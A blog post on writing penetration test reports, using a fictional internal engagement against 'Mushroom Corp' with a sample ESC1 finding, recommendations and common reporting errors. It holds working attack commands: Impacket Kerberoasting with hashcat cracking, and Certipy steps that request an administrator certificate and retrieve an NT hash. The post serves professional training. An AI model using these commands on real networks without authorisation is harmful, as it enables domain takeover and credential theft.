Intro
Reporting is important.
In offensive security, clients do not pay you to do one cool trick and call it a day; they're paying you to assess a system and give an overall breakdown of the risks and vulnerabilities you've found. After a test ends, the only real deliverable is a report detailing the issues you found over the course of the engagement.
With this in mind, you’d think that with the Certification Industrial Complex reaching all-time levels of bloat, someone would be able to explain how a report is written, going through examples of potential findings to walk people through the method as opposed to just quickly scrolling through a report?
What’s that? No, no one has? You’re telling me that the average person in tech doesn’t value writing skills and would probably enjoy offloading their creativity to AI? Ah.
Rant about writing skills aside, it is shocking that reporting almost always feels like an afterthought for many courses and instructors. Admittedly, if you’re a seasoned veteran in the field, I can understand why. However, I cannot begin to tell you how many repeat questions I see when it comes to exams where you have to deliver a report, such as the PNPT or CPTS.
My experience is obviously limited, but the point of this blog is to break down specifically how I’d approach writing a report professionally, with some bits potentially geared towards the CPTS exam, because it’s the only one I’ve taken that has a reporting component.
DISCLAIMER: There is no single correct way to write a report, hence the title. This post is meant to stay somewhat high level and address the most common components one would generally expect in any report.
A Quick Runthrough of a Report
Components
No matter how a report is structured, it will usually have the following sections:
- Executive Summary - The executive summary provides a high-level overview of the engagement, meant to give a relatively quick, not-too-technical description of what the assessment was, what happened, and sometimes a light discussion of any strategic recommendations.
- [Optional] Attack Narrative - This section is largely dependent on what type of engagement you're doing (e.g. it's more common with network pentests than application tests), but if you need it, this section summarizes all of the steps that you took in an attack chain. For standard network pentests, this might be your route to domain admin. For red teams, this would specifically be your route to the crown jewels.
- Findings - The “Findings” section is where we break down each vulnerability/risk we found on an individual basis, describing what it was, the impact, and how we would recommend remediating it. This section is what a technical team will read to verify your findings and find exactly where problems lie, so it’s important to be as clear as possible.
- Remediation/Recommendations - Most reports will include a discussion of systemic remediations in the executive summary and/or individual recommendations in each of the findings. However, some reports, like the one for CPTS, will also have a section listing all of the recommendations. Here, you don’t have to give a perfect solution that completely solves the problem and accounts for all of the internal issues a company may have, but you do have to suggest some kind of control that addresses the root cause.
- Appendices - This is another section that will vary from report to report, but it generally contains information about scope, methodology, and severity ratings. If any artifacts/indicators of compromise are left behind after an engagement, you should also list them here so the client can clean them up and they can't be used to reenter a system later.
This repo contains a bunch of public pentesting reports, and I highly recommend going through it to get a feel for what gets prioritized, as well as the different styles people take when putting reports together. For instance, you may notice that severity labels differ from report to report: a high-risk issue in one may be a critical in another, or a low-risk issue in one may be informational in another. Trying to cover every single nuance would make this blog way too long, so my rule of thumb is to make sure the details and requirements are clear enough that the client can focus on the important things.
Now, as opposed to rehashing what plenty of others have written about by describing sections, let’s run through an example scenario and how that might reflect in the various sections of a report.
Example Scenario
Writing a full report in a blog format like this one would be way too many words, so we’re going to keep this short:
Something, something, any similarity to any computers or infrastructure, living or dead, is entirely coincidental. We (TeamServer Security) are doing an internal pentest for Mushroom Corp, a small/mid-sized business. Starting from a non-domain-joined machine on the network, I found an exposed Zabbix server, logged in with default creds, and got command execution through an agent. On that box, I found plaintext credentials for a domain account, which then let me Kerberoast the domain. I was able to crack the hash of a service account that had privileges to perform ESC1 against the AD CS service, and request a certificate for the domain admin.
By describing this entire path we took, we’ve already taken steps to describe the attack narrative that we can include in the report. Of course, this paragraph alone is not enough, and we’d want to include screenshots and command output. That said, assuming we don’t have any findings outside of this path (which there very well could be), we can start breaking this down into findings.
Findings
Why start with findings? Even though the executive summary and any systemic recommendations will come first, it’s really hard to write a summary when you haven’t dug into the details yourself.
Sometimes, engagements are easy to report on because you have a bunch of discrete vulnerabilities that aren’t very related to each other, so the findings write themselves. However, another common scenario is having paths of low or medium risk issues that end up having way higher impact than any of the findings on their own. When that happens, it’s important to critically examine your path for the root causes and the risks they bring to the table. Let’s take a look at our example and how I might break it down:
- The very first thing that happened was code execution, so you'd think that would be some kind of RCE vulnerability. However, code execution through agents in Zabbix is intended functionality, albeit one controlled by a configuration setting (see the first sketch after this list). In this case, it would be good to message your client and ask whether this configuration is essential to their current operations instead of taking shots in the dark about how their environment should operate. Since this configuration is not strictly necessary, I would report a misconfiguration in Zabbix regardless of the response, but the client's answer may change how I write the recommendation. Even beyond debating whether or not command execution through an agent is truly a vulnerability, the really big problem here is the default credentials, because no standard user should even be touching this thing in the first place. (Findings: RCE via Misconfigured Zabbix Server, Default Credentials)
- Generally speaking, we don’t want to keep creds to domain accounts, especially active ones, in plain text. (Finding: Cleartext Credentials Stored on Disk)
- Kerberoasting itself is not immediately a vulnerability, at least not in the same capacity that ZeroLogon or misconfigured privileges are. Service tickets will always be encrypted with the service account's hash, and gMSAs are not a catch-all solution. However, the fact that we were able to crack the account's hash is concerning, because it is evidence of poor credential management (see the second sketch after this list). (Finding: Cracked Service Account Password - Kerberoasting)
- And finally, ESC1 is absolutely a finding. In this example, we're assuming only the service account had privileges to perform ESC1, which is better than every user being able to enroll. However, it's still reportable, because AD CS shouldn't be set up in such a way that service accounts can pivot to domain admin privileges. It is worth noting that the root cause here is not that a service account has access to AD CS (that's reasonable design), but rather the configuration of the certificate template itself. (Finding: Misconfigured Active Directory Certificate Templates - ESC1)
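To make the Zabbix and Kerberoasting bullets above a bit more concrete, here are two hedged sketches. The file path, account name, IP address, and wordlist below are hypothetical placeholders, not artifacts from the engagement. First, whether a Zabbix agent will run server-pushed commands at all comes down to its configuration, which is exactly why the client conversation matters:
# Hypothetical check on a Zabbix agent host: is remote command execution allowed?
# Older agents use EnableRemoteCommands=1; newer agents use AllowKey=system.run[*]
$ grep -E '^(EnableRemoteCommands|AllowKey)' /etc/zabbix/zabbix_agentd.conf
AllowKey=system.run[*]
Second, a minimal sketch of the roast-and-crack step, assuming Impacket's GetUserSPNs.py and hashcat are available and using the placeholder account jdoe for the compromised domain user:
# Request service tickets for accounts with SPNs using the compromised domain account
$ GetUserSPNs.py mushroomcorp.local/jdoe:'<REDACTED>' -dc-ip 10.10.10.10 -request -outputfile roasted.txt
# Attempt to crack the TGS-REP hashes offline (hashcat mode 13100)
$ hashcat -m 13100 roasted.txt /usr/share/wordlists/rockyou.txt
If the hash falls to a common wordlist, that result alone supports the credential management finding, regardless of what the cracked password ultimately unlocks.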
So, all together, these are our findings:
- RCE via Misconfigured Zabbix Server
- Default Credentials
- Cleartext Credentials Stored on Disk
- Cracked Service Account Password - Kerberoasting
- Misconfigured Active Directory Certificate Templates - ESC1
Example Finding
Let’s write up the “Misconfigured Active Directory Certificate Templates - ESC1” Finding.
CVSS: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H (7.2, high)
CWE: CWE-290: Authentication Bypass by Spoofing
Description: Active Directory Certificate Services (AD CS) templates define the policies and settings for issuing and managing certificates within an Active Directory environment. Authorized principals can request certificates from templates that are made available through an internal certificate authority (CA).
TeamServer Security identified a template vulnerable to the "ESC1" domain escalation attack, which occurs when a template is configured with the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag in the mspki-certificate-name-flag property. This allows an enrolling user to specify an arbitrary subject alternative name (SAN), effectively allowing a user to request a certificate as another user, such as a domain administrator or machine account.
Impact: An attacker that can gain access to svc_certificate, the service account authorized to request the affected certificate, can request certificates to impersonate any user in the mushroomcorp.local domain. More specifically, an attacker can leverage this certificate to gain domain administrator access to the domain, and request domain resources accordingly.
Although access to the template was restricted to a single service account, TeamServer Security successfully gained access to svc_certificate through a low-privileged user, as discussed in the "Cracked Service Account Password - Kerberoasting" finding.
Certificate Templates Impacted:
backup_crt
Evidence:
TeamServer Security enumerated the domain’s certificate templates using the open-source tool Certipy.
$ certipy find -u svc_certificate -p <REDACTED> -target mushroomcorp.local -text -stdout -vulnerable
...[snip]...
Certificate Templates
  0
    Template Name                       : backup_crt
    Display Name                        : backup_crt
    Certificate Authorities             : mushroom-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 10 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : MUSHROOMCORP.LOCAL\Domain Admins
                                          MUSHROOMCORP.LOCAL\svc_certificate
                                          MUSHROOMCORP.LOCAL\Enterprise Admins
      Object Control Permissions
        Owner                           : MUSHROOMCORP.LOCAL\Administrator
        Write Owner Principals          : MUSHROOMCORP.LOCAL\Domain Admins
                                          MUSHROOMCORP.LOCAL\Enterprise Admins
                                          MUSHROOMCORP.LOCAL\Administrator
        Write Dacl Principals           : MUSHROOMCORP.LOCAL\Domain Admins
                                          MUSHROOMCORP.LOCAL\Enterprise Admins
                                          MUSHROOMCORP.LOCAL\Administrator
        Write Property Principals       : MUSHROOMCORP.LOCAL\Domain Admins
                                          MUSHROOMCORP.LOCAL\Enterprise Admins
                                          MUSHROOMCORP.LOCAL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'MUSHROOMCORP.LOCAL\\svc_certificate' can enroll, enrollee supplies subject and template allows client authentication
The tester leveraged access as svc_certificate to request a certificate as Administrator, a member of the Domain Admins group.
$ certipy req -u svc_certificate -p <REDACTED> -target mushroomcorp.local -upn administrator@mushroomcorp.local -ca mushroom-dc-ca -template backup_crt
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 12
[*] Got certificate with UPN 'administrator@mushroomcorp.local'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
The tester then attempted to authenticate to the domain with the newly obtained certificate.
$ certipy auth -pfx administrator.pfx
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@mushroomcorp.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@mushroomcorp.local': aad3b435b51404eeaad3b435b51404ee:<REDACTED>
Remediation:
TeamServer Security recommends disabling the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag by unchecking "Supply in Request" in the Certificate Templates (certtmpl.msc) console, which prevents users from specifying arbitrary SANs in enrollment requests.
Additionally, it is recommended that Mushroom Corp review their AD CS infrastructure and templates to determine appropriate rights and permissions in accordance with the principle of least privilege.
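As a hedged verification step (assuming the same Certipy tooling used during the engagement remains available), Mushroom Corp can re-run the vulnerable-template enumeration after applying the change and confirm that backup_crt no longer appears:
$ certipy find -u svc_certificate -p <REDACTED> -target mushroomcorp.local -text -stdout -vulnerable
If the template still shows up under the [!] Vulnerabilities output, the flag change has not taken effect or another enrollment path remains.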
References:
- SpecterOps: Certified Pre-Owned
- ly4k: Certipy
- GhostPack: PSPKIAudit
Recommendations
Recommendations can be hard, especially when the "textbook" solution is not fully compatible with a client's needs, or when issues are systemic. For instance, on one application pentest, the design patterns and network communication of the app were so fundamentally flawed that it truly needed a full overhaul. Now, in that scenario, we did not pull up to a meeting with the client and say "it's all bad, fix it, skill issue".
If a vulnerability is ever that bad, it’s helpful to come up with a short term and a long term fix. In our case, we recommended implementing some hardening measures via the programming language, but long term, we simply had to recommend moving away from their model as a whole. It’s especially important to maintain a professional attitude here. The job of a pentester/red teamer/whatever we want to call it is not to gloat about how good we are and how bad everyone else is, but instead to point out the exploitability and then help clients and defenders make the right fixes.
Not every issue needs a custom solution. SQL injection can be mitigated via prepared statements. XSS can usually be mitigated with proper data validation and sanitization. In the event an issue is fuzzier, it's okay for the recommendation to be a little more generic than you'd like, but don't leave it at "harden SMB". There are plenty of cases where you may not have full visibility into the costs and benefits associated with a fix you propose; just focus on addressing the root cause and communicate with the client as best as possible.
Executive Summary
Despite the fact that the executive summary comes first in the report, it’s the last section you should really work on. This section is dedicated to a high-level overview of the engagement, including information about what it was, the scope, and most importantly, a summary of overall impressions from the engagement. I won’t go through a full executive summary here, especially since the specific structure will vary from company to company, but here are some guiding questions that can help.
- What were general trends in your findings? Were the vulnerabilities related to configuration issues, or maybe it was all injection attacks? Identifying common threads between your findings can reveal potentially systemic issues that are valuable for upper-level management to understand.
- What steps need to be taken going forward? This question is directly tied to the previous one, but is important to specifically address in the executive summary. If you see EternalBlue exploited in 2025, there’s probably something off with the client’s patch management strategy or asset inventory.
- How severe are the findings? This one's a bit more straightforward: if your findings are all medium/low, don't talk about them like they're critical issues that will destroy the client if they're not addressed. When reports are "drier" and don't have high-impact issues, take it as an opportunity to discuss what defensive controls stopped you, and what changes can be made to work towards a solid defense-in-depth strategy.
Looking back at our example scenario, we see that the issues were primarily related to credential management and configurations. In this case, we might recommend using password managers or some other secret management solution, as well as some user training to try and minimize the credential exposure we found. As for configurations, we can start by recommending “configure services in accordance with secure baselines”, but then also take time to elaborate on what about the services was insecure (e.g. Was it defaults? Was it unnecessary settings switched on?).
With all of this in mind, be sure to avoid very specific technical details here. This section is intended for management and above to read to get an idea of what happened; there's a good chance they're not up to date on specific exploits or the fine details of Active Directory, Okta, AWS, etc. Avoid acronyms, keep it concise, and write as if you're explaining it to a teacher or mentor who doesn't have your hacking skillset.
Appendices
Appendices can really be anything, but they're usually good for having explicit lists for teams to reference. Plainly writing out the scope, severity ratings used, payloads, changes to the network, compromised users, etc. makes it much easier for auditors to understand the engagement, and for defenders to handle any incident response or patching.
The Most Common Errors
I'm far from a seasoned veteran who's seen it all, but from helping review reports as people learn to write them, these are the most common issues I've seen. Shoutout to @absolute_rat on Discord for helping me with this section as well.
Credentials, Credentials, Credentials
Redact credentials from screenshots. Simple, right? It can actually be harder than you think.
It might be easy to spot usernames and passwords, but authentication material comes in many forms. SSH keys, password hashes, and JWTs are just a few of the many things you should also be redacting in your reports. On top of this, many hacking tools (looking at you, netexec) will include passwords in their command output, which can be extremely easy to miss if you're not cognizant of it. Sure, some of these might rotate or expire before they can be abused, but why take the risk?
I don’t have any easy tools or tricks to automatically spot sensitive info in your screenshots. You may be able to rig up some system with secrets scanners like TruffleHog or Nosey Parker with OCR, but it’s probably quicker to just train your eyes to check for this. Also, for the l33t among you, try avoiding the transparent terminal. Accidentally revealing an SSH key or database password because you can see through the terminal is an extremely common mistake for people taking certification exams.

Speaking of which, you may also want to sanitize your tool's output if it doesn't look very professional. There are plenty of proofs of concept out there with "epic" ASCII art headers or not-so-palatable language; just keep an eye out.
Bad Screenshots - Too Many
A picture may be worth a thousand words, but not all of those words are of the same quality. Suppose we have a finding about a file upload vulnerability, and the technical writeup section of the finding starts in a way similar to the one shown below.

I'm sure on later pages there's a description of how the web shell was used, but right now, the actual demo of the finding starts with three screenshots, no captions (more on that later), and a limited explanation, all of which hurt anyone's ability to actually understand what's important. There can certainly be findings with plenty of screenshots, but my point here is that the screenshots should serve a specific purpose. You don't need to show every menu you used to get to a location in the application, just show the one menu that is vulnerable. In the example above, the writer could have just used the last screenshot or the first one to explain where the file upload was.
An Aside: Code Blocks vs Screenshots is a matter of opinion. I've seen places default to screenshots in the name of alleviating customer doubts about the legitimacy of a finding, and I've seen places default to code blocks for easier reproducibility. Whatever you do, just make sure it's good, and that you're presenting the right information.
Bad Screenshots - No Captions
Whether you primarily use screenshots or terminal output varies from place to place and school of thought to school of thought, but regardless, not every person reading the report knows how your tools and commands work. Part of making sure your writeups are clear is including captions that give a brief description of the screenshot or terminal output. Captions can also be good supplements to annotations within the screenshots to summarize the entire attack.


Misrepresenting Impact
Would it feel good to deliver a report with 8 highs and 7 critical vulnerabilities? Yes. However, just because we want to feel like cool hackers doesn’t mean we should full send a vulnerability with an overrated severity.
Suppose you've identified an account/email enumeration issue in a login form. That, on its own, has a relatively low impact. It's still relevant, but if they also implement account lockouts, rate-limiting, etc., you can only do so much with usernames and emails. However, if you find that their password policy is weak, there are no account lockouts, and there is no rate-limiting, you could set yourself up for a situation where you can brute force credentials on a wider scale, which is a higher-risk issue.
CVSS is the most common metric you'll see used to assess severity, but it's not always the most accurate representation of risk. As the curl developers have dealt with firsthand, CVSS can easily overstate or understate the issues that are identified. The perfect example of this is the recent CUPS vulnerability with an unofficial rating of 9.9. It's definitely a vulnerability, but the score is misleading, as there is user interaction involved, albeit later in the attack steps. Coming back to the main point, how a penetration tester rates a finding will vary from company to company. Some may use custom rating systems, some stick to just CVSS, and others will show CVSS and simply put a label on it (e.g. maybe CVSS shows a high rating, but the finding is actually rated medium). Whatever the case, know that the severity of findings matters, and your goal should be to represent the risk accurately.
Writing Style
This is one of the harder ones for me to explain because I am not an English or writing teacher, but there are some common pitfalls when you’re doing the actual writing.
For one, try sticking to an active voice as much as possible. Here’s an example of passive voice:
The web application was exploited by the tester after running the sqlmap tool to retrieve the admin's hash.
Here, the action ("exploited") is performed on the subject ("the web application"), which adds some unnecessary verbosity to the sentence. The active voice would look like this:
The tester exploited the web application by running the sqlmap tool to obtain the admin's hash.
By using the active voice, the sentence reads more clearly without compromising professionalism. Now, not every sentence needs to be in the active voice, but striving to format sentences in this way can help keep your message straightforward, which can be important when talking about complex attacks.
Also related to this example, another common pitfall is overusing phrases like “the tester”. My preferred solution is to use synonyms like “the team” or “[COMPANY NAME]”, or even pronouns if it makes sense in context, like “they” or “theirs”. However, if you’re confident in your writing skills, you can actually omit “the tester” altogether:
sqlmap, an open-source tool, identified a time-based SQL injection vulnerability in the application. In doing so, the tool successfully extracted the admin user's password hash.
This example is not perfect and certainly isn't my writing style, but it is absolutely another approach you can take.
Conclusion
Hopefully, this serves as a good reference for anyone looking to learn about reporting or improve their reporting skills. There’s only so much I could include in here before it gets way too long. Realistically speaking, if you are hired by a company to do penetration testing, they should be the ones to train you on their reporting process. However, I still think it’s helpful to have information like this out there, for those wanting to learn about this job or for those who want a different perspective.
The best practice you can get at reporting is by just doing it. Do practice labs/networks, copy an existing report template, and give it a try! Struggling through awkward situations will only make your ability to break down vulnerabilities and risk that much better. That said, reports can take a lot of time and effort, so starting with simpler writeups might be better. I highly recommend checking out 0xdf or 7Rocky for their writeups on various CTF challenges. Although they're not real environments, they do a great job of pacing and presenting information.